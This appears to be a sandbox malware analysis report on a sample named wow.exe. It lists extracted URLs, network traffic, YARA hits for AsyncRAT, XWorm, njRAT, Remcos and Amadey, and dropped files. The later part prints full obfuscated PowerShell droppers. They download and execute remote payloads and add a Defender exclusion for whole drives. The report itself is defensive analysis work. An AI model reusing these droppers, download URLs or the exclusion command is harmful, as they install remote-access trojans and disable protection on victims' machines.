                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes)
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F90000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ingonherbal.com/application/PhEbceg4Tx/
                            Source: wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
                            Source: wow.exe, 00000000.00000003.2189433630.0000028D65E18000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2189433630.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0427/
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.variomedia.de/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhengxinpeixun.oss-cn-qingdao.aliyuncs.com/0011b9cd240249c3aeb520ea1205eaf1.jpg
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51664
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51907
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51664 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51768
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51768 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51907 -> 443
                            Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49928 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49996 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:50032 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:50065 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:50127 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:50129 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:51664 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:51768 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:51907 version: TLS 1.2
                            Source: C:\Users\user\Downloads\haus\T.exeWindow created: window name: CLIPBRDWNDCLASS

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                            Source: sslproxydump.pcap, type: PCAPMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 28.2.Enalib.exe.7890000.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: 28.2.Enalib.exe.7890000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 9.3.wow.exe.1d428d2b790.97.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: 9.3.wow.exe.1d428d2b790.97.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 28.2.Enalib.exe.28fef3c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
                            Source: 28.2.Enalib.exe.28fef3c.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: 28.2.Enalib.exe.28fef3c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 28.2.Enalib.exe.7890000.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: 28.2.Enalib.exe.7890000.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 16.2.svchost.exe.5270000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                            Source: 19.0.vapo.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: 19.0.vapo.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 28.2.Enalib.exe.28fef3c.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: 28.2.Enalib.exe.28fef3c.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000009.00000003.2331326155.000001D42C3A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000009.00000003.2331326155.000001D42C380000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000009.00000003.2901512124.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0000001C.00000002.2876237438.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: 0000001C.00000002.2876237438.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000013.00000000.2272038750.00000000000E2000.00000002.00000001.01000000.0000002A.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000010.00000002.2576592704.0000000005270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                            Source: 00000009.00000003.2349081758.000001D42C3A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0000001C.00000002.2840616612.00000000072B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                            Source: 00000009.00000003.2807337493.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0000001C.00000002.2576679059.0000000002648000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                            Source: C:\Users\user\Downloads\haus\amada2.exe, type: DROPPEDMatched rule: Amadey downloader payload Author: ditekSHen
                            Source: C:\ProgramData\1be588a5b7\gdsun.exe, type: DROPPEDMatched rule: Amadey downloader payload Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\vapo.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: C:\Users\user\AppData\Roaming\vapo.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\Downloads\haus\vapo.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                            Source: C:\Users\user\Downloads\haus\vapo.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            PE file has a writeable .text section
                            Source: sel1.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: traf.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Powershell drops PE file
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\1be588a5b7\Enalib.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\1be588a5b7\T.exeJump to dropped file
                            Windows Scripting host queries suspicious COM object (likely to drop second stage)
                            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                            Wscript starts Powershell (via cmd or directly)
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA=="
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uforfrdetheds181; function Yasmak($Unsatanical){$Puritanic=3;do{$Joumbos+=$Unsatanical[$Puritanic];$Puritanic+=4} until(!$Unsatanical[$Puritanic])$Joumbos}function Seksualhygiejnen($Unshowmanlike){ .($bluenoser) ($Unshowmanlike)}$Calamondin=Yasmak 'T nn onEchaTGra.Ke W';$Calamondin+=Yasmak 'Jo EU sbSt,cCoulHarI.tue InnRebT';$Longwise=Yasmak 'ForMMi.oSorzGaviF rl,irlA faEnt/';$Stavkirkes=Yasmak ' AmTovel WasI n1Avn2';$Litterateur36='S.e[Plan .oeFreTFus.BusS IneT urSamv TaI Brc HueN npCe oMiniBilNOliTAtoMFimA AknLenAIvrGHese arUnc] Mo: a:halSAfkEElecF ruLilrMyxID rtMacY,egPPetrProo .aT,alo NoCAtooP rl B = re$ .aST xtMisA GavEmbKUdkiAccRfemkPreeForS';$Longwise+=Yasmak 'Low5 k .me 0Ov Snd(YasWUnhi,ocnUnbdNovoTrawM ds Sp OveNAnmTFra Ine1 ic0.nt. tr0Kli; ro AttWAkviI dn Un6 Ba4Lab;Fi, K txPre6Hel4No ;,cc BrrDisvOv : h1Pra3Muf4 H .Qu 0Sup) Un F rG .neKyscG.sk,amoGrn/Liv2Fra0Ank1Res0Non0 Pa1Can0 an1Mio ConFA.yigu.rLg e .yf FioHypxMa,/Kvl1Br 3Lns4Tra. on0';$Daarlighed=Yasmak 'midU UnSRepeT arVes-StrAFakG UneProN M T';$Radioactive=Yasmak ' Mah ertExotSkipA,ts nd:,at/pol/ComfNoni ilEt eSamdUnan.ro.floe H uLis/IntlordmAffjBonM ny1ManI .nt Tai,beFBruCE,uHIrrjkoeYFisATer4ApaJDahNOphRWeeBSvvYForB a3Ly 4B,f/ OvODepuHomt ResForoH ba .ar if. artPelo R c';$Stbeformens=Yasmak 'San>';$bluenoser=Yasmak 'SkriProeTilx';$Courtmartial='Hale';$Bacillebrerens='\Autonephrectomy.Noc';Seksualhygiejnen (Yasmak 'Pre$ForGHjeLUndoSchb MoaHallStr:SheUNadnDesCFrdUInhsS.ohAlfiF noLanNGarE orDPr =Ord$ SaEHypNPr.vBe,: UdA rsP N PPaud ekAViqt FuaMal+Bre$LamBPorA apCOutI ,ol arLS.rE rybOver.nmE ToRForET ln.eas');Seksualhygiejnen (Yasmak 'Sla$ Cog HalSjaO,kiBMura ppLRec:IllMA hYBorS CetThrIpolk te,ipr U.efannHal1Enr4Ant1 el= nn$ esr AkALigdG viComOUbna giCSanTerii,akVFore ,a.KursMagp,ncL uiIT oT in(Kmp$RouSAfsTDe BObsETenf ceoDacr PamFliE R nPl sLas)');Seksualhygiejnen (Yasmak $Litterateur36);$Radioactive=$Mystikeren141[0];$Recognise=(Yasmak 'Kip$LgfgBooLPreo DabXenaFinlPre:na eCheNTrnAstymHaleunmL JaI H,nBliGU.hSEla=SpanfulEDecW os- .io xcBO vjIndECouc ,vt P MoS.oaYPres ibt Flesc mr.l.Rad$EkscFugA ptl ,rALi,MEksoStunSupdUpcIKjon');Seksualhygiejnen ($Recognise);Seksualhygiejnen (Yasmak ' Uf$ B E denWuzaCymmPreeMi,l leiBernStagSubsO e. dHBlye Ala .odSp eBi,rUncsKe,[Abi$WalDOr.awyvaKilrBryl,ntiT,lglarhBese,epdEd ]Myr=Sys$.paLKonoRetnNongG nwStuia.tsEjee');$Upcutting173=Yasmak 'S g$Ju,EPr.nChuaFalma,re BrlReriS lnSkagChus Kr.DiaDMoyo tewTr nB tlGlao PoaAk dThyFBe.ihyll uneGem(Phi$SipR InaSupdSariUncoOveaIt cTaatFo iRunvHj e H ,Ta $ irV ,ii OtdRepe anbFloe .og yprH,oetoftBlosLa,1 Ud7 l 9d k)';$Videbegrets179=$Uncushioned;Seksualhygiejnen (Yasmak 'P r$ iGSquLSelopl bBeha arLSka:ScrsCoitTafRC aufrdkPertBakU ivRAr.eUs.RSape ,us Pr=Pa (ColtSplE BrS BaTB l-Ab.pblaA eT lahDec Ser$ .aVlocI edVe EPh BLigECligtror aeO,etFleSFra1De,7S e9Dev)');while (!$Struktureres
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Praefectorial61; function buxine($frugtavlens){$Millimicron=3;do{$Hestevognens+=$frugtavlens[$Millimicron];$Millimicron+=4} until(!$frugtavlens[$Millimicron])$Hestevognens}function Phonetist($Timebilletten){ .($procommemoration) ($Timebilletten)}$Bromphenol=buxine 'varnBelET eT.ru.RefW';$Bromphenol+=buxine 'SameLo bSkaCEroLUndigruE.rsn.ndT';$Bruttotonnagens=buxine ' trMShioAngzjoriArblTeblDykaWal/';$Hysses=buxine 'E rTUndlKnisRa 1 Es2';$Wispiness=' .t[ pn RrE ,ot lt.StrSRedESn RMagVSkaiSorCkeyEEltPMi,o GaIPhonDebTKr.mSrbaSt.NFeja S.GDelECytR Qu]Sha:Hyd:st SGoueJazClocuResrM sIEj,tA.lyEdipOb,r SiOSaltOliO B C HiON nl Ka= S.$UniHShoYRu sAlfS VaEDanS';$Bruttotonnagens+=buxine ' Fe5Unm.Su 0Fil Th(RenWFisi emnV,td NooMaaw losBl, UfoN coT Ku Gyp1,ro0 Sr.Bad0Sol;,ou Fu W VeiNonnHen6Shu4sch;S p dex nr6Cat4Foc;San Kryr U,vAfs:Cag1 nc3Ind4Trl.squ0,ou)Sur StyGgeneDiscSkok,vmomas/Sac2Ge 0 Ry1Swa0Ske0 ro1Led0Mil1 ft ecF bii Hor apeEksf HeoSvmxD t/Par1Re.3par4Par.Tu.0';$Procedurereglerne=buxine ' roUDiasKrbe w RVra- uaStoG StE Ban.jrt';$Isotomous222=buxine 'UdmhAt t ActUnlpAsysByg:lev/L,n/NonfFiliLivl FoeFrsd B,nTrk. BeeEnkuDei/ otlFormFurjThyMhae1LanIFoutSneiForFTilCSubHArrjuraYHasA H 4StrJAwaN faRT eBAnkYTraBTom3 Sm4Wes/ MuKSnraCapnIdeaSe r .oiPare lrG ne.genBrusTet.P.cq ,uxMond';$Raukle=buxine 'B,d>';$procommemoration=buxine ' V IFraET.aX';$Skiftnings='Teglvrksovn';$Sbredders='\Rten.Men';Phonetist (buxine ' Sc$.erg ,oLBanoRe.bUnaA,ral re:Spon TiO egn enOgenwA lnOpleR mrSem= eh$ A,e,erNHivvpre:CisAEklP FopAduDRe aB.lt dlaSta+Ban$RenSDykbBacr neD fd,urdStaeAutrU eS');Phonetist (buxine 'P e$OmvgmodlB loDkbBP raHreLMed: DifAalR VaaTott enrTa AP eeCinD B ESyslV.rS Ples,is KodU dA I GSenE ReNut =Nac$ForImins FooOvetspro S,MHemOCobUStosf.r2 Po2Pea2Aff.YonSCykpg,sLEugi DdT N (Unc$datrRaaAGr UHankTypLPowEG k)');Phonetist (buxine $Wispiness);$Isotomous222=$Fratraedelsesdagen[0];$sagnomspundent=(buxine 'C n$UneG raLAndOAmabSu,aSmlLObs:Up.D.eoEPreF ose FiNInteBepsskatPi.rHykA UntS aeKap= TrnMaxEPrewD s- rooMusbHykj UnesndCTret Lo ImpSU myLacSD wtViseHa.mFor.ung$U vBI drHouO Afm lP WahBu ESa NTiloMe.L');Phonetist ($sagnomspundent);Phonetist (buxine 'Sup$ etDCoue ymfMeseFornSp eFarsAfttLarrFleaUgetAcce R..Ru.He pe elaChrdEnfeUnsr MesArb[Dis$NutP arUndo wac N,e ErdtatuModr PoeL mrD aeAghgSuplBlae.murDe nLa e iv] T,=Bas$RenB Snr.onuStotS mtEksoSentinto Bin Conpr.aPolg Ene S.nFles');$Plectognathous=buxine 'Ank$ IrDIsoeskmfbule Agn O eBeas C tvarrW aaCiat O ePre.u,rD sooVinwN kn ylUdko SvaCryd LnFTkkiSpdlDemeBuk(Me.$Th IO.ksDetogrotAnloSupmAuto EgumonsSvi2 M 2 Pe2Fol,Mor$DriO I r,std omrFore eb.eleSuph ReaIntnHaad,enlOpfiPronHolgSo eGhonDom)';$Ordrebehandlingen=$nonowner;Phonetist (buxine 'Sor$M,agPr.lNonoOpubS ea,veL jo:AgrN Pui nfT axRBj,oU sp.ndH.ynY E T ubiPerCAmo= Na(BertRipELa SStrT.nb-S gPS laCo.tlevhTnk Lig$AfdoRygR oldDenrgrueD mBSy
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Svrte; function Bebrejd($Stomode){$Gemologist=3;do{$Uncountervailed+=$Stomode[$Gemologist];$Gemologist+=4} until(!$Stomode[$Gemologist])$Uncountervailed}function Shoepacs137($Typhobacillosis){ .($Facies) ($Typhobacillosis)}$Reprsentationsudgifts=Bebrejd 'jouN oEVi TSni.SorW';$Reprsentationsudgifts+=Bebrejd 'UnheBenBSubCHa,LA ti BaeManN loT';$Landboforenings173=Bebrejd 'PolMLinoTouzB ni PrlMadl craVaf/';$Shirra=Bebrejd 'KnoTBoolI tssuz1Br 2';$Boligkonsulentens=' St[Norn onEdk.T bo..fvSEn EFrkRPervBryi eacInfePrepHydOexti onNDamtDyrMPavAFreNSejAUveG u eGenrNeu]Aar: el:LassSaeeFedc nuRafR StiFedTHanY idPEnjrAf.OlottCigo ruCOv O SmLBro=Kal$ djs kkhNyhi yrRTriR hea';$Landboforenings173+=Bebrejd 'Co 5Un . ss0 Sk .ig( A WCoriBr,n I dFaroUdfwSlasMng conN,anTIll Fe1M.c0 Bo.Ha.0Ypp;Gen GloWHjliInsnCaf6 an4flu; Un gsx Fi6Chr4 Pr;Dik S crForv C.:Per1 St3 ow4Ind. rn0Arn) I IneGFale DucpotkShioRes/Bo 2,aa0La 1Nig0kv 0 ev1Bod0For1Skr an,F itiUnsrBane nfM aoS uxSti/kon1N l3 dg4Drm.d.u0';$Bramantip=Bebrejd ' ru ShsDeleF rRDmp- ShATr gSmiEMilNAmbt';$Forskrev=Bebrejd 'SmahPapttvatFempChesSte:F r/Sy,/ ShfS ni MolJete udBaanHex.K,aeS iuTax/nivlNeumLaejKamMgen1 gtIOvetA.kibroFJarCSwiHBocjU cYK eABe 4KapJRauNBruRA aBMerYModBTr 3Mar4Sc / SaUUnonS cdbareon r vb Opa Akl ydaSelnDelcAboe rurStan,oleHjasTwi.tarjBebaS ovMana';$Sjaslikkens247=Bebrejd ' Op>';$Facies=Bebrejd 'NonITraE SuX';$Torrentially21='Topazolite';$Gordiaceous='\Transitvarerne.Fli';Shoepacs137 (Bebrejd 'F.l$HjfGAfsl leOAerb BraTeaL n:IrrPForR.dde heGNebn .peIn NBadoForlGr OUn,nopfEpre9Str4.il=gol$gi EnedN,kiv,ph:sydA VeP EkPge DMetAResTRe,aDec+ind$Plag NooDelRAskD NaI,ilaUnscAlpeTh Oas,uXylS');Shoepacs137 (Bebrejd 'lan$RetG E,l TiORelBLjba polO e: Fos utyTruDRekFTavO ViR ,ahPaeN,pig ScEAukNUnsE.ty= Se$ A,F.beO.ndrS.rSS ckKolRProEEnsV Dr..xcsEjePRutLsatIhottDyn(Ego$ uts E j InaBruSAbsl E i.usKKlikkoneLivN .as va2.pl4Hex7 u)');Shoepacs137 (Bebrejd $Boligkonsulentens);$Forskrev=$Sydforhngene[0];$Smutches=(Bebrejd 'Com$ ImgPreLTitOWaxbStraPrelTre: AusAf ASilP FiSFedU .oCAfgKI gEIncRSpaSLo =Runn aE VawMor- ndoPa.b,enJRapeF,dc.onTU,m OgdsPl,YH,nS,inTQuiE ,im Li..ta$SecRSjlETriPBruRT.iSNonEAntn,ouT B.ARotT eIGenO .yNSkrsCosu end BlGSupI nfGimt .ds');Shoepacs137 ($Smutches);Shoepacs137 (Bebrejd ' h$CatSUnoaTampnrrs TuuDescSnikEnde FerTo s pu.BnkH E,e tea VedLumeRebrBilsSub[Op $ unBZerrAlba Inm braVe npartSpoiKonp,ta]Tel= L $,peLOu a tonBuddTikbP roignf iso Oprbr eEftnFabiFornJasgSensMe 1Ens7 Sn3');$Udfordrernes229=Bebrejd 'P.d$SkaSJ.ra BrpAr.s F,uCouc PekHoleE sr Cos xy.S dD ,no raw knnRefl Bio Sna Bud,epFAboiPrelTwieFol( Sp$CanF Gro rerCyms P.kNewrSomeChrvInv,Bev$ForKIvrohavaPenlt piNert E i B.oO tnT.ie .nn C,s Al)';$Koalitionens=$Pregnenolone94;Shoepacs137 (Bebrejd 'Sku$S,oGInclGusoReib SyaDisLFol:BesnStrOSurnPalROvie ,uM OvEImmdL,gITh aTorb WaLScaEC u=Gaa( ArTBlaeHersRg.tSup-
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Svrte; function Bebrejd($Stomode){$Gemologist=3;do{$Uncountervailed+=$Stomode[$Gemologist];$Gemologist+=4} until(!$Stomode[$Gemologist])$Uncountervailed}function Shoepacs137($Typhobacillosis){ .($Facies) ($Typhobacillosis)}$Reprsentationsudgifts=Bebrejd 'jouN oEVi TSni.SorW';$Reprsentationsudgifts+=Bebrejd 'UnheBenBSubCHa,LA ti BaeManN loT';$Landboforenings173=Bebrejd 'PolMLinoTouzB ni PrlMadl craVaf/';$Shirra=Bebrejd 'KnoTBoolI tssuz1Br 2';$Boligkonsulentens=' St[Norn onEdk.T bo..fvSEn EFrkRPervBryi eacInfePrepHydOexti onNDamtDyrMPavAFreNSejAUveG u eGenrNeu]Aar: el:LassSaeeFedc nuRafR StiFedTHanY idPEnjrAf.OlottCigo ruCOv O SmLBro=Kal$ djs kkhNyhi yrRTriR hea';$Landboforenings173+=Bebrejd 'Co 5Un . ss0 Sk .ig( A WCoriBr,n I dFaroUdfwSlasMng 